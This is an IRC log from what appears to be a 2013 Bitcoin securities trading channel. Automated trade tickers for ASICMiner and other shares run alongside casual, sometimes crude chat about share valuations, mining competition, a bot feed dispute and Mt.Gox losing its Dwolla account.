[HAVELOCK] [ASICM] 46 @ 0.01649 = 0.7585 BTC [+] May 14 19:16:25 [BTCTC] [ASICMINER-PT] 1 @ 1.730011 BTC [+] May 14 19:17:08 [BTCTC] [ASICMINER-PT] 2 @ 1.4 = 2.8 BTC [-] May 14 19:17:27 [BTCTC] [RSM] 83 @ 0.011 = 0.913 BTC [+] May 14 19:17:30 [BTCTC] [TAT.ASICMINER] 16 @ 0.01665 = 0.2664 BTC [+] May 14 19:17:35 [BTCTC] [TAT.ASICMINER] 150 @ 0.01665 = 2.4975 BTC [+] May 14 19:17:40 [BTCTC] [TAT.ASICMINER] 37 @ 0.01667 = 0.6168 BTC [+] May 14 19:18:08 [BTCTC] [TAT.ASICMINER] 113 @ 0.01667 = 1.8837 BTC [+] May 14 19:18:09 So, what do you guys think a share of AM will be worth in 4 weeks? May 14 19:18:23 [BTCTC] [TAT.ASICMINER] 50 @ 0.01667 = 0.8335 BTC [+] May 14 19:18:47 I mean market price on exchanges, not a snarky personal value May 14 19:18:50 TAKE MY BITCOIN !!! May 14 19:18:59 [BTCTC] [BITVPS] 10 @ 0.000869 = 0.0087 BTC [+] May 14 19:19:19 [BTCTC] [BITVPS] 1 @ 0.00087 BTC [+] May 14 19:19:37 [BTCTC] [BITVPS] 49 @ 0.00091 = 0.0446 BTC [+] May 14 19:19:44 [BTCTC] [BITVPS] 350 @ 0.000968 = 0.3388 BTC [+] May 14 19:19:45 depend on news and power release ? i've no share so i not follow May 14 19:20:07 [BTCTC] [TAT.ASICMINER] 110 @ 0.01672 = 1.8392 BTC [+] May 14 19:20:08 also hardware sales May 14 19:20:08 [BTCTC] [BITVPS] 1000 @ 0.00097 = 0.97 BTC [+] May 14 19:20:15 i read they have 20% of all networks May 14 19:20:17 [BTCTC] [TAT.ASICMINER] 46 @ 0.01672 = 0.7691 BTC [+] May 14 19:20:21 i'm fairly bullish for the next few weeks May 14 19:20:22 [BTCTC] [BITVPS] 35 @ 0.00099 = 0.0347 BTC [+] May 14 19:20:31 but outlook for a month gets foggy May 14 19:21:24 mostly because AM mining hashrate goals continue to move May 14 19:21:33 and dunno what competitors will do May 14 19:22:11 20% it's huuuge May 14 19:22:14 value has to top somewhere May 14 19:22:33 do you thinks they can go up to 20% May 14 19:23:03 can't believe i bought asicminer shares so cheap May 14 19:23:08 720btc EVERY single day haha, May 14 19:23:42 I think if hits 2btc per share May 14 19:23:51 you'll see people starting to sell of their board seats May 14 19:23:52 ThickAsThieves i was thinking 2.5 is dump time May 14 19:24:06 off* May 14 19:24:18 2.5 might never come May 14 19:24:23 2.2 is a valuation per share i've seen tossed around May 14 19:24:32 thats my target May 14 19:24:36 yeah it's really high May 14 19:24:43 always the same story, i'm too late or not haha May 14 19:24:49 i figure once it hits 2, itll have once last rally May 14 19:24:56 then fall May 14 19:25:08 surely it's going to fall May 14 19:25:13 but this is pretty much a guessing game May 14 19:25:25 urite May 14 19:25:33 how much the last div ? May 14 19:25:38 .011 May 14 19:25:44 it's everyweek no ? May 14 19:25:45 this one stands to be much higher May 14 19:25:47 yeah May 14 19:25:50 yep May 14 19:25:57 they sold like 180 blades May 14 19:26:02 plus X SUBminers May 14 19:26:05 USB May 14 19:26:11 lots of bitcoins May 14 19:26:23 it's already include in the weekly div ? May 14 19:26:32 not yet May 14 19:26:41 [BTCTC] [ASICMINER-PT] 3 @ 1.735 = 5.205 BTC [+] May 14 19:26:55 if they pay out all the money from blades thats .02 alone May 14 19:27:03 friedcat is running one hell of an organization froma fucking forum thread May 14 19:27:04 mining will be at least .014 May 14 19:27:05 kudos May 14 19:27:27 howevr May 14 19:27:32 with that kind of income May 14 19:27:41 i suspect he needs to do some reinvesting May 14 19:27:46 and wont pay it ALL out May 14 19:27:54 i hope May 14 19:27:57 [BTCTC] [TAT.ASICMINER] 44 @ 0.01672 = 0.7357 BTC [+] May 14 19:28:02 [BTCTC] [TAT.ASICMINER] 100 @ 0.01678 = 1.678 BTC [+] May 14 19:28:05 soo i need 150 week (at actual div) to break even ? May 14 19:28:13 i miss something ? May 14 19:28:15 [BTCTC] [TAT.ASICMINER] 150 @ 0.01678 = 2.517 BTC [+] May 14 19:28:23 come to papa May 14 19:29:23 sales are DEAD on bitfunder :/ May 14 19:30:23 error4733 , it is very easy to figure out - about 25000 bitcoins are mined a week / percentage of network AM has / 400,000 shares + hardware sales May 14 19:30:42 [BTCTC] [TAT.ASICMINER] 15 @ 0.01681 = 0.2522 BTC [+] May 14 19:30:43 + HW sales /400000 May 14 19:31:16 even if you pay 1.75 for your share May 14 19:31:28 this week's div could be 2% May 14 19:31:45 if you get brave and turn that into APR... May 14 19:31:48 that is correct May 14 19:32:14 then get even more risky and turn that into compounded APR May 14 19:32:19 with reinvestment... May 14 19:32:30 [BTCTC] [BASIC-MINING] 1 @ 0.4199 BTC [+] May 14 19:32:31 2BTC/share becomes obvious May 14 19:32:31 price depends on what people are willing to have as a APR May 14 19:32:40 [BTCTC] [BASIC-MINING] 2 @ 0.42 = 0.84 BTC [+] May 14 19:32:40 ok, where i sign ? May 14 19:32:50 hehe May 14 19:32:54 but at Bitfunder man May 14 19:32:56 100 APR or 30 APR May 14 19:32:57 cheapest there May 14 19:33:03 or Havelock May 14 19:33:16 personally, I like Havelock the best May 14 19:33:21 [BTCTC] [BASIC-MINING] 1 @ 0.43 BTC [+] May 14 19:33:27 as an issuer May 14 19:33:31 After MPEX of course May 14 19:33:32 I def prefer Havelock May 14 19:34:01 i'd sell my AM PT on mpex too, but that's like selling swampland to MP I think May 14 19:34:32 well, the last PT was a nightmare - so I do not blame him May 14 19:34:37 yeah May 14 19:34:47 nothing good is forced, i say May 14 19:35:32 ThickAsThieves i would guess it most depends on bitfury atm May 14 19:36:03 really there could easily be a private version of BitFury too May 14 19:36:10 indeed. May 14 19:36:11 no need to broadcast your intentions May 14 19:36:21 just build the things and grab 20% of the network May 14 19:36:25 or more May 14 19:36:31 if indeed the guy can deliver in the petahash range... May 14 19:36:48 someone pointed out that the petahash thing would be a power problem May 14 19:36:48 gamechanger. May 14 19:37:11 if he's under 1w/gh as he says, then it's 1mw May 14 19:38:02 i'm kinda calloused on new mining ventures though May 14 19:38:10 I'll believe it when they ship it May 14 19:38:20 i can see why lol May 14 19:38:35 he did risk a lot of money on it tho, and he doesn't really have preorders or even a site May 14 19:38:42 but who;'s to know at this point. May 14 19:39:50 if i were gonna run a scam, i'd have no issue frontng 100btc May 14 19:39:56 to legitimize it May 14 19:40:25 ya but what's the scam ? it was clear with bfl, what with the website and google ads etc May 14 19:40:31 if enough people join in the bet May 14 19:40:36 he can bet the other side May 14 19:40:39 and come out clean May 14 19:40:49 not really, math it out May 14 19:40:56 clean enough May 14 19:41:04 marketing expense May 14 19:41:16 i'm not saying its a scam May 14 19:41:24 but marketing for what, if he's betting the other side. May 14 19:41:25 just that a 100btc doesnt prove he isnt May 14 19:41:44 certainly doesn't prove it. May 14 19:42:00 so, May 14 19:42:08 as you may or may not know May 14 19:42:24 Friedcat said he'd ship "test" blades to each board member May 14 19:42:29 this never happened May 14 19:42:38 but it is built in as a perk May 14 19:42:43 in all the PT offerings May 14 19:42:49 including mine May 14 19:43:04 I contemplated just buying one now, to 1-up the competition May 14 19:43:18 this would be a marketing expense May 14 19:43:30 ive mostly ruled out the idea May 14 19:43:36 but i could easily spin it May 14 19:43:42 to make TAT.AM appealing May 14 19:43:54 and command market pricer May 14 19:43:56 price* May 14 19:43:59 thoughts? May 14 19:44:21 they cost 50btc May 14 19:44:30 plus bullshit time of running one May 14 19:45:02 [HAVELOCK] [VTX] 6 @ 0.46475 = 2.7885 BTC [+] May 14 19:46:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.01681 = 0.0504 BTC [+] May 14 19:47:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.01681 = 0.0672 BTC [+] May 14 19:48:02 [HAVELOCK] [ASICM] 20 @ 0.016512 = 0.3302 BTC [+] May 14 19:48:17 [BTCTC] [ASICMINER-PT] 1 @ 1.75498 BTC [+] May 14 19:49:22 [BTCTC] [TAT.ASICMINER] 85 @ 0.01674 = 1.4229 BTC [-] May 14 19:49:45 [BTCTC] [ASICMINER-PT] 1 @ 1.75978 BTC [+] May 14 19:50:11 [BTCTC] [TAT.ASICMINER] 42 @ 0.01669 = 0.701 BTC [-] May 14 19:51:21 [BTCTC] [ASICMINER-PT] 1 @ 1.75978 BTC [+] May 14 19:52:08 [BTCTC] [ASICMINER-PT] 1 @ 1.759999 BTC [+] May 14 19:53:06 [BTCTC] [ASICMINER-PT] 1 @ 1.76 BTC [+] May 14 19:54:27 [BTCTC] [ASICMINER-PT] 1 @ 1.75988 BTC [-] May 14 19:54:46 [BTCTC] [TAT.ASICMINER] 20 @ 0.01669 = 0.3338 BTC [-] May 14 19:55:24 [BTCTC] [ASICMINER-PT] 1 @ 1.762498 BTC [+] May 14 19:56:47 http://www.reddit.com/r/collapse/comments/1e9veg/bitcoin_will_tear_down_civilization/ May 14 19:57:17 [BTCTC] [TAT.ASICMINER] 15 @ 0.01674 = 0.2511 BTC [+] May 14 19:57:43 [BTCTC] [TAT.ASICMINER] 100 @ 0.01677 = 1.677 BTC [+] May 14 19:58:00 i skimmed like 3 phrases May 14 19:58:00 [BTCTC] [TAT.ASICMINER] 78 @ 0.01681 = 1.3112 BTC [+] May 14 19:58:12 wild assumptions of doomsday scenarios May 14 19:58:24 [BTCTC] [TAT.ASICMINER] 100 @ 0.01685 = 1.685 BTC [+] May 14 19:59:20 [BTCTC] [TAT.ASICMINER] 100 @ 0.01688 = 1.688 BTC [+] May 14 20:02:09 [BTCTC] [ASICMINER-PT] 1 @ 1.75988 BTC [-] May 14 20:02:26 [BTCTC] [ASICMINER-PT] 1 @ 1.75988 BTC [-] May 14 20:02:36 [BTCTC] [TAT.ASICMINER] 67 @ 0.017 = 1.139 BTC [+] May 14 20:03:19 [BTCTC] [TAT.ASICMINER] 100 @ 0.01703 = 1.703 BTC [+] May 14 20:08:22 [BTCTC] [TAT.ASICMINER] 49 @ 0.01715 = 0.8404 BTC [+] May 14 20:09:12 [BTCTC] [BASIC-MINING] 8 @ 0.411004 = 3.288 BTC [-] May 14 20:09:16 [BTCTC] [BASIC-MINING] 1 @ 0.411003 BTC [-] May 14 20:09:20 [BTCTC] [BASIC-MINING] 1 @ 0.411003 BTC [-] May 14 20:11:56 [BTCTC] [TAT.ASICMINER] 100 @ 0.01725 = 1.725 BTC [+] May 14 20:12:18 [BTCTC] [TAT.ASICMINER] 25 @ 0.01725 = 0.4313 BTC [+] May 14 20:12:32 [BTCTC] [TAT.ASICMINER] 33 @ 0.01725 = 0.5693 BTC [+] May 14 20:13:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.016251 = 0.0325 BTC [-] May 14 20:15:26 [BTCTC] [COGNITIVE] 1 @ 0.2233 BTC [-] May 14 20:16:00 [BTCTC] [TAT.ASICMINER] 10 @ 0.0175 = 0.175 BTC [+] May 14 20:16:23 [BTCTC] [TAT.ASICMINER] 75 @ 0.01747 = 1.3103 BTC [-] May 14 20:17:04 [BTCTC] [TAT.ASICMINER] 50 @ 0.0175 = 0.875 BTC [+] May 14 20:17:16 [BTCTC] [TAT.ASICMINER] 5 @ 0.0175 = 0.0875 BTC [+] May 14 20:17:46 [BTCTC] [S.DICE-PT] 1 @ 0.00357 BTC [-] May 14 20:17:49 [BTCTC] [ASICMINER-PT] 4 @ 1.767986 = 7.0719 BTC [+] May 14 20:18:02 [HAVELOCK] [SDICE] 5 @ 0.2849 = 1.4245 BTC [+] May 14 20:18:04 [BTCTC] [TAT.ASICMINER] 95 @ 0.0175 = 1.6625 BTC [+] May 14 20:19:12 [BTCTC] [TAT.ASICMINER] 73 @ 0.017589 = 1.284 BTC [+] May 14 20:20:02 [HAVELOCK] [ASICM] 230 @ 0.016512 = 3.7978 BTC [+] May 14 20:21:02 [HAVELOCK] [SDICE] 3 @ 0.2849 = 0.8547 BTC [+] May 14 20:21:03 [HAVELOCK] [SDICE] 1 @ 0.2849 BTC [+] May 14 20:21:45 [BTCTC] [TAT.ASICMINER] 52 @ 0.017588 = 0.9146 BTC [-] May 14 20:24:07 [BTCTC] [ASICMINER-PT] 2 @ 1.746 = 3.492 BTC [-] May 14 20:24:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.017512 BTC [-] May 14 20:27:09 [BTCTC] [TAT.ASICMINER] 60 @ 0.01749 = 1.0494 BTC [-] May 14 20:29:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.01745 = 0.0349 BTC [-] May 14 20:29:39 [BTCTC] [ASICMINER-PT] 1 @ 1.76797 BTC [+] May 14 20:30:48 [BTCTC] [ASICMINER-PT] 1 @ 1.767986 BTC [+] May 14 20:30:50 [BTCTC] [ASICMINER-PT] 1 @ 1.76797 BTC [-] May 14 20:31:29 [BTCTC] [RSM] 17 @ 0.011 = 0.187 BTC [+] May 14 20:31:35 [BTCTC] [ASICMINER-PT] 1 @ 1.735 BTC [-] May 14 20:31:38 [BTCTC] [RSM] 1 @ 0.011 BTC [+] May 14 20:32:39 [BTCTC] [ASICMINER-PT] 4 @ 1.73001 = 6.92 BTC [-] May 14 20:35:20 [BTCTC] [ASICMINER-PT] 1 @ 1.720008 BTC [-] May 14 20:39:28 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199697 BTC [+] May 14 20:39:29 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1997 BTC [+] May 14 20:39:32 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1998 = 0.3996 BTC [+] May 14 20:41:02 [HAVELOCK] [ASICM] 12 @ 0.016512 = 0.1981 BTC [+] May 14 20:44:02 [HAVELOCK] [HIM] 1 @ 2.15 BTC [+] May 14 20:45:02 [HAVELOCK] [SDICE] 7 @ 0.2849 = 1.9943 BTC [+] May 14 20:49:05 asciilifeform handpicked for your sheer delight : deacon meets mpoe-pr. https://bitcointalk.org/index.php?topic=186043.msg2145731#msg2145731 May 14 20:50:37 [MPEX] [S.MPOE] 4500 @ 0.00067632 = 3.0434 BTC [-] May 14 20:50:53 aright May 14 20:50:56 who broke btctc May 14 20:51:02 [HAVELOCK] [ASICM] 38 @ 0.016512 = 0.6275 BTC [+] May 14 20:51:03 [HAVELOCK] [ASICM] 62 @ 0.01655 = 1.0261 BTC [+] May 14 20:55:26 inhies what do you mean ? May 14 20:55:46 https://btct.co/ May 14 20:55:51 Error: May 14 20:55:53 Xcoind backend failure in getbalance at 77 May 14 20:56:27 yeah been down for a while May 14 20:56:36 booo May 14 20:56:44 works for me May 14 20:56:50 i was JUST looking at it May 14 20:56:52 boooooooo May 14 20:56:57 i was gonn buy some TAT May 14 20:56:59 but oh well May 14 20:57:00 hm May 14 20:57:02 ThickAsThieves: wanna cut me a deal? May 14 20:57:23 maybe May 14 20:57:24 fwiw, the api still appears to be up May 14 20:57:34 pm if you are serious May 14 20:57:44 https://bitcointalk.org/index.php?topic=148291.0 May 14 20:57:48 i am but not for any real quantity :p May 14 20:57:48 apparently it happens May 14 20:58:05 [BTCTC] [RSM] 1 @ 0.024 BTC [+] May 14 20:58:12 it happened last week too May 14 20:58:12 i never got my code done for the btctc api May 14 20:58:24 cant handle all this action May 14 21:02:02 [HAVELOCK] [ASICM] 63 @ 0.01655 = 1.0427 BTC [+] May 14 21:02:03 [HAVELOCK] [ASICM] 200 @ 0.01655 = 3.31 BTC [+] May 14 21:02:33 [BTCTC] [PAJKA.BOND] 1 @ 0.104 BTC [+] May 14 21:02:47 [BTCTC] [PAJKA.BOND] 9 @ 0.1059 = 0.9531 BTC [+] May 14 21:05:02 [HAVELOCK] [ASICM] 38 @ 0.01655 = 0.6289 BTC [+] May 14 21:06:03 [HAVELOCK] [ASICM] 38 @ 0.01649 = 0.6266 BTC [-] May 14 21:06:39 Havelock has a little trouble with heavy use too May 14 21:07:31 btw, i am not sure about 'splitting off' May 14 21:07:41 I have had the bitfunder channel since well, Bitfunder launched May 14 21:08:13 I had a bot made for this channel primarily to handle peoples requests, was told no, so stuck it in bitfunder. not really "splitting off" May 14 21:08:39 kako says no to your hipster bot :/ May 14 21:08:59 but I really would like to see reliable Bitfunder trades firing in here May 14 21:09:50 agreed May 14 21:09:58 [BTCTC] [B.YABMC] 20 @ 0.01842 = 0.3684 BTC [+] May 14 21:10:00 its not like its hard to do :( May 14 21:10:09 but apparently assbot's owner doesnt wanna do May 14 21:10:22 [BTCTC] [B.YABMC] 4 @ 0.01848 = 0.0739 BTC [+] May 14 21:10:38 the what May 14 21:10:46 [BTCTC] [B.YABMC] 1 @ 0.01849 BTC [+] May 14 21:10:50 doesnt wanna do what May 14 21:11:11 implementing assbot is 2 min of work, ask anybody who has done it May 14 21:11:24 i mean adding bitfunder to it May 14 21:11:29 instead of having a second bot in here May 14 21:11:32 i gave him the spec May 14 21:11:40 as he asked. May 14 21:11:45 not much more i can do May 14 21:12:00 is there soemting i could do? May 14 21:12:03 except for suckin his dick. May 14 21:12:36 you like baby? May 14 21:12:38 fitty cent May 14 21:12:55 right May 14 21:12:57 kakobrekla: you said theres a spec for assbot. is there some way i could parse the trade data and send it to assbot ? May 14 21:12:59 i dont have time to setup that stuff atm May 14 21:13:11 I have biger things than adding support for a channel of another 30 users May 14 21:13:25 how about this May 14 21:13:57 Anyone here who does NOT CURRENTLY USE BITFUNDER, would you activly trade on and use bitfunder if it was streaming in irc? May 14 21:14:02 if i get more than 30 users say yes May 14 21:14:09 lol May 14 21:14:09 then i will dedicated all the time needed to it May 14 21:14:17 but seeing as half the channel actively uses bf already May 14 21:14:21 i dont trhink its a real issue May 14 21:14:47 there arent evne 30 people that speak in here May 14 21:14:56 thats not a good indicator May 14 21:14:57 also May 14 21:15:13 [BTCTC] [TAT.ASICMINER] 63 @ 0.0169 = 1.0647 BTC [-] May 14 21:15:20 it certainly doesnt HURT you to stream in here May 14 21:15:25 as i see it May 14 21:15:43 I am Joe Smith with intentions of growing my exchange May 14 21:15:59 i learn of awesome channel that will let me stream my trades there May 14 21:16:07 i think to myself May 14 21:16:18 i wonder how much theyd charge me to stream there too May 14 21:16:27 free, you say?! May 14 21:16:31 I'll get right on it! May 14 21:16:49 who said it was free? May 14 21:16:58 oh May 14 21:17:00 hehe May 14 21:17:09 you get my point though May 14 21:17:14 it's good outreach May 14 21:17:46 [BTCTC] [GSDPT] 33 @ 0.00304 = 0.1003 BTC [+] May 14 21:18:09 [BTCTC] [GSDPT] 1 @ 0.00304 BTC [+] May 14 21:19:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.0169 = 0.0338 BTC [-] May 14 21:20:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.01735 = 0.0347 BTC [+] May 14 21:21:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.017351 BTC [+] May 14 21:24:21 [BTCTC] [ASICMINER-PT] 1 @ 1.764999 BTC [+] May 14 21:24:35 [BTCTC] [ASICMINER-PT] 6 @ 1.765 = 10.59 BTC [+] May 14 21:24:43 [BTCTC] [ASICMINER-PT] 11 @ 1.7676 = 19.4436 BTC [+] May 14 21:24:50 [BTCTC] [ASICMINER-PT] 1 @ 1.76797 BTC [+] May 14 21:24:58 [BTCTC] [ASICMINER-PT] 11 @ 1.767999 = 19.448 BTC [+] May 14 21:25:14 [BTCTC] [PAJKA.BOND] 10 @ 0.1059 = 1.059 BTC [+] May 14 21:27:03 i would like to see it here May 14 21:27:09 but im also in #bitfunder so its not a deal breaker May 14 21:27:16 and i can always run my own ticker in a terinal window May 14 21:28:53 sure give me a signed statement from ukto that he approves you sending in data in his name and you can implement it May 14 21:29:24 but the BF bot isnt reliable May 14 21:29:29 it disappears often May 14 21:31:51 speaking of :) May 14 21:32:46 aww assbot, dont be mad May 14 21:33:26 kakobrekla: so bot ticker quotes are legally binding? May 14 21:33:41 hehe May 14 21:33:47 yes they are mpex receipts May 14 21:33:50 no i just dont want him to come here and say 'wtf is this shit' May 14 21:33:54 MP guarantees all May 14 21:33:59 :) May 14 21:34:12 people rely on this info May 14 21:34:37 iirc someone made even irc parser for trades May 14 21:35:45 kakobrekla: if you want Ukto's signature, there's better ways May 14 21:36:00 why is the sig a problem May 14 21:36:05 it takes 5s to do May 14 21:36:08 its not May 14 21:36:08 well no but letting 3rd party in the line is kinda risky May 14 21:36:34 why cant assbot just parse the data coming from bitfunder? May 14 21:36:38 why's it suck a pita? May 14 21:36:54 inhies wouldn't even have to be deliberately you know ? May 14 21:36:57 How rude can people be... May 14 21:38:07 it will prolly ping timeoout again May 14 22:23:17 [BTCTC] [GSDPT] 1 @ 0.0028 BTC [-] May 14 22:23:18 [BTCTC] [GSDPT] 2 @ 0.0028 = 0.0056 BTC [-] May 14 22:23:19 [BTCTC] [ASICMINER-PT] 3 @ 1.75 = 5.25 BTC [-] May 14 22:23:19 [BTCTC] [ASICMINER-PT] 2 @ 1.75 = 3.5 BTC [-] May 14 22:23:20 [MPEX] [S.MPOE] 6800 @ 0.00068157 = 4.6347 BTC [+] May 14 22:23:21 [BTCTC] [ASICMINER-PT] 2 @ 1.75 = 3.5 BTC [-] May 14 22:23:22 [HAVELOCK] [ASICM] 36 @ 0.0166 = 0.5976 BTC [-] May 14 22:23:23 [HAVELOCK] [ASICM] 100 @ 0.0165 = 1.65 BTC [-] May 14 22:23:24 [HAVELOCK] [ASICM] 77 @ 0.01629 = 1.2543 BTC [-] May 14 22:23:25 [HAVELOCK] [ASICM] 4 @ 0.01629 = 0.0652 BTC [-] May 14 22:23:26 [BTCTC] [ASICMINER-PT] 1 @ 1.75 BTC [-] May 14 22:23:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.017355 BTC [+] May 14 22:23:28 [BTCTC] [TAT.ASICMINER] 6 @ 0.01719 = 0.1031 BTC [-] May 14 22:23:28 [BTCTC] [ASICMINER-PT] 3 @ 1.75 = 5.25 BTC [-] May 14 22:23:29 [HAVELOCK] [HIM] 1 @ 2.11 BTC [-] May 14 22:23:30 [BTCTC] [CRYPTO-TRADE] 1 @ 0.17297 BTC [-] May 14 22:23:31 [BTCTC] [TAT.ASICMINER] 10 @ 0.01719 = 0.1719 BTC [-] May 14 22:23:32 [BTCTC] [TAT.ASICMINER] 85 @ 0.01699 = 1.4442 BTC [-] May 14 22:23:33 [HAVELOCK] [HIM] 1 @ 2.15 BTC [+] May 14 22:23:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.01719 = 0.0344 BTC [+] May 14 22:23:37 [BTCTC] [ASICMINER-PT] 3 @ 1.75 = 5.25 BTC [-] May 14 22:29:03 [BTCTC] [ASICMINER-PT] 1 @ 1.749999 BTC [-] May 14 22:30:03 [HAVELOCK] [HIM] 1 @ 2.1 BTC [-] May 14 22:30:34 [BTCTC] [ASICMINER-PT] 1 @ 1.75 BTC [+] May 14 22:30:48 [BTCTC] [ASICMINER-PT] 19 @ 1.75 = 33.25 BTC [+] May 14 22:32:21 https://news.ycombinator.com/item?id=5707441 May 14 22:32:22 what May 14 22:33:03 [HAVELOCK] [HIM] 1 @ 2.05 BTC [-] May 14 22:33:19 yeah. May 14 22:33:29 they were raided in japan a few weeks ago too May 14 22:33:31 what's the surprise here ? May 14 22:35:17 yes, gozzila come to ask private key May 14 22:36:39 I logged into Dwolla and can verify that is most likely accurate May 14 22:36:55 [BTCTC] [ASICMINER-PT] 3 @ 1.75 = 5.25 BTC [+] May 14 22:37:06 They have been removed from Dwolla May 14 22:39:13 HOHO May 14 22:39:24 [BTCTC] [TAT.ASICMINER] 36 @ 0.01709 = 0.6152 BTC [-] May 14 22:39:26 for realz? May 14 22:39:29 popcorn time May 14 22:39:31 dwolla/gox is done? May 14 22:39:56 is there a more reliable link somewhere? May 14 22:40:06 other than some png file May 14 22:40:44 I logged into my Dwolla account and I am not a retard, it is not available right now. signed me May 14 22:41:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.01709 BTC [-] May 14 22:41:27 it's big % ? May 14 22:41:36 hmm May 14 22:41:49 i logged into to mine but dont see anything May 14 22:41:57 try sending a $ May 14 22:42:01 o wat May 14 22:42:03 ;;ticker May 14 22:42:04 BTCUSD ticker | Best bid: 118.54999, Best ask: 118.56000, Bid-ask spread: 0.01001, Last trade: 118.56000, 24 hour volume: 26615.66637578, 24 hour low: 116.02500, 24 hour high: 119.80002, 24 hour vwap: 118.48201 May 14 22:42:10 i'm all cashed out May 14 22:42:13 so not worried May 14 22:42:17 nah May 14 22:42:23 idiot faucet's dunzo though May 14 22:42:23 i wonder if they got Campbx too May 14 22:42:27 [03:33:29] they were raided in japan a few weeks ago too May 14 22:42:29 raided for what, exactly May 14 22:42:33 they comply with the law May 14 22:42:37 that was a joke May 14 22:42:38 They are gone from the system, it says User no longer available May 14 22:42:41 and that wasn't a hoax? May 14 22:42:43 this is an easy thing to claim May 14 22:42:46 "they comply with the law" May 14 22:43:02 sounds like more wall street bullshit May 14 22:43:10 ;;eightball This is a hoax ? May 14 22:43:10 The answer is a resounding no. May 14 22:43:36 [BTCTC] [TAT.ASICMINER] 70 @ 0.01709 = 1.1963 BTC [-] May 14 22:43:41 Diablo-D3 yeah. let me tell you a story about wallstreet. May 14 22:43:46 Send to* May 14 22:43:47 The user to send to could not be found. May 14 22:43:53 mtgox thinks mpex is "illegal". mtgox thinks it is legal. May 14 22:44:02 coinbase thinks "it is bringing bitcoin to wallstreet" May 14 22:44:06 mtgox is getting fucked. May 14 22:44:10 add it up and get some conclusion. May 14 22:44:11 so May 14 22:44:17 this will cause a price run up right? May 14 22:44:26 as people try to get out of gox cash May 14 22:44:33 that used to use dwolla May 14 22:44:37 briefly May 14 22:44:39 uh May 14 22:44:41 so May 14 22:44:41 then the easy spigot goes away May 14 22:44:43 yea May 14 22:44:46 dwolla says user 812-649-1010 not found May 14 22:44:48 mircea_popescu: except coinbase doesnt actually exist May 14 22:45:00 and I wish people would quit talking about it May 14 22:45:05 correct me but dwolla is for small amount ? with the fee etc.. May 14 22:45:13 kinda the point. May 14 22:45:17 its just another scam like bfl and bitcoinica May 14 22:45:18 [BTCTC] [TAT.ASICMINER] 54 @ 0.01709 = 0.9229 BTC [-] May 14 22:45:57 i used dwolla a ot May 14 22:46:01 was fast May 14 22:46:02 you could send $5000 a time for 25 cents May 14 22:46:03 cheap May 14 22:46:12 a lot* May 14 22:46:24 dwolla also works with campbc May 14 22:46:28 campbx May 14 22:46:34 wonder if thats intact May 14 22:46:36 k, i'm not US based so, not very aware about dwolla May 14 22:46:58 it was by far the easiest way to move $ with gox May 14 22:48:17 campbx? May 14 22:49:16 backfire related to coinbase case ? May 14 22:49:27 that's what i first thought also May 14 22:49:44 part of coinbase's lawyers doing their thing May 14 22:50:02 [HAVELOCK] [HIM] 3 @ 2.1499 = 6.4497 BTC [+] May 14 22:50:56 that would be some good lawyering May 14 22:51:02 [HAVELOCK] [ASICM] 36 @ 0.0167 = 0.6012 BTC [+] May 14 22:52:16 for giggles: http://www.coinlab.com/ May 14 22:52:30 new mpex byline on this occasion. May 14 22:52:46 hehe May 14 22:53:05 a tad cryptic May 14 22:53:42 coinlab, we made a website and added a gox quote to it, that is $75 million now May 14 22:53:48 ? May 14 22:54:14 75$ of damage May 14 22:54:17 [BTCTC] [TAT.ASICMINER] 32 @ 0.01699 = 0.5437 BTC [-] May 14 22:54:21 [BTCTC] [TAT.ASICMINER] 19 @ 0.01699 = 0.3228 BTC [-] May 14 22:54:25 so if I wanted to sell 480btc, how would I do it? May 14 22:54:28 braindamage. May 14 22:54:36 lotsa ways May 14 22:54:44 well, they did have to buy a domain name for 4.99 i guess May 14 22:54:54 if you dont wanna be tracked May 14 22:54:56 sell otc May 14 22:55:01 or localbitcoins and such May 14 22:55:12 if you are okay with AML/KYC May 14 22:55:24 campbx will do dwolla, money order, ACH May 14 22:55:45 you can buy gift cards with some of your btc May 14 22:55:52 to spend on amazon shit etc May 14 22:55:55 etc etc May 14 22:56:06 I dont trust these companies with AML/KYC May 14 22:56:19 they havent proven they are properly storing the data securely as per the law May 14 22:56:20 US doesnt trust companies without it May 14 22:56:30 they arent banks May 14 22:56:39 banks dont deal in bitcoin May 14 22:56:47 not my problem May 14 22:56:52 sounds like it is May 14 22:56:57 its very easy to securely store data, why have they not proven they are May 14 22:56:58 WTS 30 G.ASICMINER-PT shares! May 14 22:57:02 [HAVELOCK] [ASICM] 11 @ 0.01687999 = 0.1857 BTC [+] May 14 22:57:07 lol May 14 22:57:18 DT, whats your rate May 14 22:57:29 gimme a deal and terms and I'll buy an asston May 14 22:57:33 I think this is probably why I had my modship removed on the forums May 14 22:57:39 they got tired of me pointing out problems May 14 22:57:57 like, I cleaned up tbe BFL mess no one else was willing to do, and everyone who was in on the scam got pissy May 14 22:58:05 I can sell for 1.68, I just want to sell these 30 May 14 22:58:11 I told people bitcoinica wasnt safe, and people got pissy and then never apologized to me May 14 22:58:17 buying a new computer so cashing out some BTC May 14 22:58:29 I told people GLBSE wasnt safe after what nefario tried to do to DMC, and people didnt listen May 14 22:58:31 ah, i cant help you there May 14 22:58:38 (DT) May 14 22:58:53 so I dunno May 14 22:59:01 Diablo, I'm confused what you are telling us now May 14 22:59:01 Im seriously considering just cashing in all my btc and leaving May 14 22:59:09 that AML/KYC will be our doom? May 14 22:59:13 ThickAsThieves: Im tired of fucktards trying to fuck me over. May 14 22:59:15 ;;ticker May 14 22:59:15 thats what Im saying May 14 22:59:16 BTCUSD ticker | Best bid: 114.51001, Best ask: 114.71000, Bid-ask spread: 0.19999, Last trade: 114.51001, 24 hour volume: 38002.45117133, 24 hour low: 114.42057, 24 hour high: 119.80002, 24 hour vwap: 117.75825 May 14 22:59:19 its why I wont send mtgox my data May 14 22:59:31 I dont trust mtgox to properly secure it because mtgox refuses to prove it is properly secured May 14 22:59:56 